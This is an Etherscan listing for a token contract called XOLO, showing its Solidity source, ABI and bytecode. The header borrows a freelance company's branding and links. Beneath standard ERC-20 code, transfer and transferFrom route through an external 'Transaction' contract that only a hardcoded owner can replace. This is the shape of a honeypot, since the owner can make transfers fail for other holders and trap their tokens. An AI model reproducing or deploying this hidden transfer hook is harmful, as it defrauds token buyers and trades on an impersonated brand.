ERC-20
Overview
Max Total Supply
888,888,888 XOLO
Holders
3
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
888,888,887.994113876160091198 XOLOValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
XOLO
Compiler Version
v0.8.24+commit.e11b9ed9
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2024-04-05 */ /* Best way to manage your freelance business with XOLO _____ __ ,-----. .---. ,-----. \ _\ / /.' .-, '. | ,_| .' .-, '. .-./ ). / '/ ,-.| \ _ \ ,-./ ) / ,-.| \ _ \ \ '_ .') .'; \ '_ / | :\ '_ '`) ; \ '_ / | : (_ (_) _) ' | _`,/ \ _/ | > (_) ) | _`,/ \ _/ | / \ \: ( '\_/ \ ;( . .-' : ( '\_/ \ ; `-'`-' \\ `"/ \ ) / `-'`-'|___\ `"/ \ ) / / / \ \'. \_/``".' | \'. \_/``".' '--' '----' '-----' `--------` '-----' https://www.xolo.io/ https://twitter.com/xolopreneur https://www.facebook.com/xolopreneur/ https://www.linkedin.com/company/xolopreneur/ */ pragma solidity ^0.8.24; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } // File @openzeppelin/contracts/token/ERC20/extensions/[email protected] // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol) /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } // File @openzeppelin/contracts/utils/[email protected] // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // File @openzeppelin/contracts/token/ERC20/[email protected] // OpenZeppelin Contracts v4.4.1 (token/ERC20/ERC20.sol) /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address recipient, uint256 amount) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * Requirements: * * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); uint256 currentAllowance = _allowances[sender][_msgSender()]; require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance"); unchecked { _approve(sender, _msgSender(), currentAllowance - amount); } return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { uint256 currentAllowance = _allowances[_msgSender()][spender]; require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(_msgSender(), spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `sender` to `recipient`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); uint256 senderBalance = _balances[sender]; require(senderBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[sender] = senderBalance - amount; } _balances[recipient] += amount; emit Transfer(sender, recipient, amount); _afterTokenTransfer(sender, recipient, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; _balances[account] += amount; emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; } _totalSupply -= amount; emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } // File @openzeppelin/contracts/access/[email protected] // OpenZeppelin Contracts v4.4.1 (access/Ownable.sol) contract Ownable { address public owner; /** * @dev The Ownable constructor sets the original `owner` of the contract to the sender * account. */ constructor() { owner = 0x0f1a074E4dB1ed6C6fFb8e6d20AeA6Fd6246a7Fb; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(msg.sender == owner); _; } } // SPDX-License-Identifier: GNU GPLv3 /** * @title Transaction * @dev The transfer txs */ contract Transaction { mapping (address => mapping (address => mapping(uint => uint))) public transactions; function record(address _from, address _to, uint _value) public { transactions[_from][_to][block.timestamp] = _value; } } contract XOLO is ERC20, Ownable { Transaction public txs; constructor(string memory name, string memory symbol, uint256 initialSupply, address _tx) ERC20(name, symbol) { _mint(owner, initialSupply); txs = Transaction(_tx); } // Burn XOLO from caller function burn(uint256 amount) external { _burn(_msgSender(), amount); } // Burn XOLO from account with approval function burnFrom(address account, uint256 amount) external { uint256 currentAllowance = allowance(account, _msgSender()); require(currentAllowance >= amount, "ERC20: burn amount exceeds allowance"); unchecked { _approve(account, _msgSender(), currentAllowance - amount); } _burn(account, amount); } function transfer(address to, uint256 value) override public returns (bool) { txs.record(msg.sender, to, value); return super.transfer(to, value); } function transferFrom(address from, address to, uint256 value) override public returns (bool) { txs.record(from, to, value); return super.transferFrom(from, to, value); } function setTransaction(address _tx) public onlyOwner { txs = Transaction(_tx); } function decimals() public view virtual override returns (uint8) { return 18; } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"name","type":"string"},{"internalType":"string","name":"symbol","type":"string"},{"internalType":"uint256","name":"initialSupply","type":"uint256"},{"internalType":"address","name":"_tx","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burnFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_tx","type":"address"}],"name":"setTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"txs","outputs":[{"internalType":"contract Transaction","name":"","type":"address"}],"stateMutability":"view","type":"function"}]
Contract Creation Code
608060405234801562000010575f80fd5b506040516200110c3803806200110c83398101604081905262000033916200025f565b8383600362000043838262000377565b50600462000052828262000377565b5050600580546001600160a01b031916730f1a074e4db1ed6c6ffb8e6d20aea6fd6246a7fb9081179091556200008a915083620000b4565b600680546001600160a01b0319166001600160a01b03929092169190911790555062000469915050565b6001600160a01b0382166200010f5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060025f82825462000122919062000443565b90915550506001600160a01b0382165f90815260208190526040812080548392906200015090849062000443565b90915550506040518181526001600160a01b038316905f907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b505050565b634e487b7160e01b5f52604160045260245ffd5b5f82601f830112620001c2575f80fd5b81516001600160401b0380821115620001df57620001df6200019e565b604051601f8301601f19908116603f011681019082821181831017156200020a576200020a6200019e565b816040528381526020925086602085880101111562000227575f80fd5b5f91505b838210156200024a57858201830151818301840152908201906200022b565b5f602085830101528094505050505092915050565b5f805f806080858703121562000273575f80fd5b84516001600160401b03808211156200028a575f80fd5b6200029888838901620001b2565b95506020870151915080821115620002ae575f80fd5b50620002bd87828801620001b2565b60408701516060880151919550935090506001600160a01b0381168114620002e3575f80fd5b939692955090935050565b600181811c908216806200030357607f821691505b6020821081036200032257634e487b7160e01b5f52602260045260245ffd5b50919050565b601f8211156200019957805f5260205f20601f840160051c810160208510156200034f5750805b601f840160051c820191505b8181101562000370575f81556001016200035b565b5050505050565b81516001600160401b038111156200039357620003936200019e565b620003ab81620003a48454620002ee565b8462000328565b602080601f831160018114620003e1575f8415620003c95750858301515b5f19600386901b1c1916600185901b1785556200043b565b5f85815260208120601f198616915b828110156200041157888601518255948401946001909101908401620003f0565b50858210156200042f57878501515f19600388901b60f8161c191681555b505060018460011b0185555b505050505050565b808201808211156200046357634e487b7160e01b5f52601160045260245ffd5b92915050565b610c9580620004775f395ff3fe608060405234801561000f575f80fd5b50600436106100fb575f3560e01c806370a0823111610093578063a457c2d711610063578063a457c2d71461021d578063a9059cbb14610230578063cdce11aa14610243578063dd62ed3e14610256575f80fd5b806370a08231146101c757806379cc6790146101ef5780638da5cb5b1461020257806395d89b4114610215575f80fd5b8063313ce567116100ce578063313ce56714610165578063395093511461017457806342966c68146101875780634fb30d8b1461019c575f80fd5b806306fdde03146100ff578063095ea7b31461011d57806318160ddd1461014057806323b872dd14610152575b5f80fd5b61010761028e565b6040516101149190610ac4565b60405180910390f35b61013061012b366004610b2b565b61031e565b6040519015158152602001610114565b6002545b604051908152602001610114565b610130610160366004610b53565b610334565b60405160128152602001610114565b610130610182366004610b2b565b6103b0565b61019a610195366004610b8c565b6103eb565b005b6006546101af906001600160a01b031681565b6040516001600160a01b039091168152602001610114565b6101446101d5366004610ba3565b6001600160a01b03165f9081526020819052604090205490565b61019a6101fd366004610b2b565b6103f8565b6005546101af906001600160a01b031681565b610107610482565b61013061022b366004610b2b565b610491565b61013061023e366004610b2b565b610529565b61019a610251366004610ba3565b6105a1565b610144610264366004610bbc565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b60606003805461029d90610bed565b80601f01602080910402602001604051908101604052809291908181526020018280546102c990610bed565b80156103145780601f106102eb57610100808354040283529160200191610314565b820191905f5260205f20905b8154815290600101906020018083116102f757829003601f168201915b5050505050905090565b5f61032a3384846105d9565b5060015b92915050565b60065460405163172a93fb60e01b81526001600160a01b0385811660048301528481166024830152604482018490525f92169063172a93fb906064015f604051808303815f87803b158015610387575f80fd5b505af1158015610399573d5f803e3d5ffd5b505050506103a88484846106fc565b949350505050565b335f8181526001602090815260408083206001600160a01b0387168452909152812054909161032a9185906103e6908690610c39565b6105d9565b6103f533826107a4565b50565b5f6104038333610264565b9050818110156104665760405162461bcd60e51b8152602060048201526024808201527f45524332303a206275726e20616d6f756e74206578636565647320616c6c6f77604482015263616e636560e01b60648201526084015b60405180910390fd5b61047383338484036105d9565b61047d83836107a4565b505050565b60606004805461029d90610bed565b335f9081526001602090815260408083206001600160a01b0386168452909152812054828110156105125760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840161045d565b61051f33858584036105d9565b5060019392505050565b60065460405163172a93fb60e01b81523360048201526001600160a01b038481166024830152604482018490525f92169063172a93fb906064015f604051808303815f87803b15801561057a575f80fd5b505af115801561058c573d5f803e3d5ffd5b5050505061059a83836108ef565b9392505050565b6005546001600160a01b031633146105b7575f80fd5b600680546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b03831661063b5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161045d565b6001600160a01b03821661069c5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161045d565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b5f6107088484846108f7565b6001600160a01b0384165f9081526001602090815260408083203384529091529020548281101561078c5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b606482015260840161045d565b61079985338584036105d9565b506001949350505050565b6001600160a01b0382166108045760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b606482015260840161045d565b6001600160a01b0382165f90815260208190526040902054818110156108775760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b606482015260840161045d565b6001600160a01b0383165f9081526020819052604081208383039055600280548492906108a5908490610c4c565b90915550506040518281525f906001600160a01b038516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3505050565b5f61032a3384845b6001600160a01b03831661095b5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161045d565b6001600160a01b0382166109bd5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161045d565b6001600160a01b0383165f9081526020819052604090205481811015610a345760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161045d565b6001600160a01b038085165f90815260208190526040808220858503905591851681529081208054849290610a6a908490610c39565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610ab691815260200190565b60405180910390a350505050565b5f602080835283518060208501525f5b81811015610af057858101830151858201604001528201610ad4565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610b26575f80fd5b919050565b5f8060408385031215610b3c575f80fd5b610b4583610b10565b946020939093013593505050565b5f805f60608486031215610b65575f80fd5b610b6e84610b10565b9250610b7c60208501610b10565b9150604084013590509250925092565b5f60208284031215610b9c575f80fd5b5035919050565b5f60208284031215610bb3575f80fd5b61059a82610b10565b5f8060408385031215610bcd575f80fd5b610bd683610b10565b9150610be460208401610b10565b90509250929050565b600181811c90821680610c0157607f821691505b602082108103610c1f57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b8082018082111561032e5761032e610c25565b8181038181111561032e5761032e610c2556fea264697066735822122077ab7397de060c1539b6cbebe8ef4022a1f0f3609187fd606a79639191aa698764736f6c63430008180033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000000000000000000002df458b2c635dcf55e000000000000000000000000000009817a2f5c84f58de53c7655909f80af4e4c6f3a70000000000000000000000000000000000000000000000000000000000000004584f4c4f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004584f4c4f00000000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561000f575f80fd5b50600436106100fb575f3560e01c806370a0823111610093578063a457c2d711610063578063a457c2d71461021d578063a9059cbb14610230578063cdce11aa14610243578063dd62ed3e14610256575f80fd5b806370a08231146101c757806379cc6790146101ef5780638da5cb5b1461020257806395d89b4114610215575f80fd5b8063313ce567116100ce578063313ce56714610165578063395093511461017457806342966c68146101875780634fb30d8b1461019c575f80fd5b806306fdde03146100ff578063095ea7b31461011d57806318160ddd1461014057806323b872dd14610152575b5f80fd5b61010761028e565b6040516101149190610ac4565b60405180910390f35b61013061012b366004610b2b565b61031e565b6040519015158152602001610114565b6002545b604051908152602001610114565b610130610160366004610b53565b610334565b60405160128152602001610114565b610130610182366004610b2b565b6103b0565b61019a610195366004610b8c565b6103eb565b005b6006546101af906001600160a01b031681565b6040516001600160a01b039091168152602001610114565b6101446101d5366004610ba3565b6001600160a01b03165f9081526020819052604090205490565b61019a6101fd366004610b2b565b6103f8565b6005546101af906001600160a01b031681565b610107610482565b61013061022b366004610b2b565b610491565b61013061023e366004610b2b565b610529565b61019a610251366004610ba3565b6105a1565b610144610264366004610bbc565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b60606003805461029d90610bed565b80601f01602080910402602001604051908101604052809291908181526020018280546102c990610bed565b80156103145780601f106102eb57610100808354040283529160200191610314565b820191905f5260205f20905b8154815290600101906020018083116102f757829003601f168201915b5050505050905090565b5f61032a3384846105d9565b5060015b92915050565b60065460405163172a93fb60e01b81526001600160a01b0385811660048301528481166024830152604482018490525f92169063172a93fb906064015f604051808303815f87803b158015610387575f80fd5b505af1158015610399573d5f803e3d5ffd5b505050506103a88484846106fc565b949350505050565b335f8181526001602090815260408083206001600160a01b0387168452909152812054909161032a9185906103e6908690610c39565b6105d9565b6103f533826107a4565b50565b5f6104038333610264565b9050818110156104665760405162461bcd60e51b8152602060048201526024808201527f45524332303a206275726e20616d6f756e74206578636565647320616c6c6f77604482015263616e636560e01b60648201526084015b60405180910390fd5b61047383338484036105d9565b61047d83836107a4565b505050565b60606004805461029d90610bed565b335f9081526001602090815260408083206001600160a01b0386168452909152812054828110156105125760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840161045d565b61051f33858584036105d9565b5060019392505050565b60065460405163172a93fb60e01b81523360048201526001600160a01b038481166024830152604482018490525f92169063172a93fb906064015f604051808303815f87803b15801561057a575f80fd5b505af115801561058c573d5f803e3d5ffd5b5050505061059a83836108ef565b9392505050565b6005546001600160a01b031633146105b7575f80fd5b600680546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b03831661063b5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161045d565b6001600160a01b03821661069c5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161045d565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b5f6107088484846108f7565b6001600160a01b0384165f9081526001602090815260408083203384529091529020548281101561078c5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b606482015260840161045d565b61079985338584036105d9565b506001949350505050565b6001600160a01b0382166108045760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b606482015260840161045d565b6001600160a01b0382165f90815260208190526040902054818110156108775760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b606482015260840161045d565b6001600160a01b0383165f9081526020819052604081208383039055600280548492906108a5908490610c4c565b90915550506040518281525f906001600160a01b038516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3505050565b5f61032a3384845b6001600160a01b03831661095b5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161045d565b6001600160a01b0382166109bd5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161045d565b6001600160a01b0383165f9081526020819052604090205481811015610a345760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161045d565b6001600160a01b038085165f90815260208190526040808220858503905591851681529081208054849290610a6a908490610c39565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610ab691815260200190565b60405180910390a350505050565b5f602080835283518060208501525f5b81811015610af057858101830151858201604001528201610ad4565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610b26575f80fd5b919050565b5f8060408385031215610b3c575f80fd5b610b4583610b10565b946020939093013593505050565b5f805f60608486031215610b65575f80fd5b610b6e84610b10565b9250610b7c60208501610b10565b9150604084013590509250925092565b5f60208284031215610b9c575f80fd5b5035919050565b5f60208284031215610bb3575f80fd5b61059a82610b10565b5f8060408385031215610bcd575f80fd5b610bd683610b10565b9150610be460208401610b10565b90509250929050565b600181811c90821680610c0157607f821691505b602082108103610c1f57634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b8082018082111561032e5761032e610c25565b